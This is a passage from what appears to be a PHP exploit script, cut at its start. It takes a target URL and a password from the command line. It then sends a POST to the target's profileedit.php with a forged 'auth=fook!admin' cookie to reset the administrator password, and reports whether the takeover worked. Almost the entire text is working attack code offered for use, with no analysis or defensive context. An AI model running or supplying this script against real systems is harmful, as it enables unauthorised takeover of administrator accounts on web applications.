\n\n", $argv[0]); exit; } list($script, $target, $pass) = $argv; $xpl = curl_init(); curl_setopt_array($xpl, array ( CURLOPT_URL => "{$target}/profileedit.php", CURLOPT_COOKIE => "auth=fook!admin", CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => "password={$pass}" )); $ret = curl_exec($xpl); curl_close($xpl); $out = preg_match_all('#Profile Updated<\/b>#', $ret, $tmp) ? "[+] Done. You can login now\n\n" : "[-] Exploitation failed\n\n"; echo $out; ?>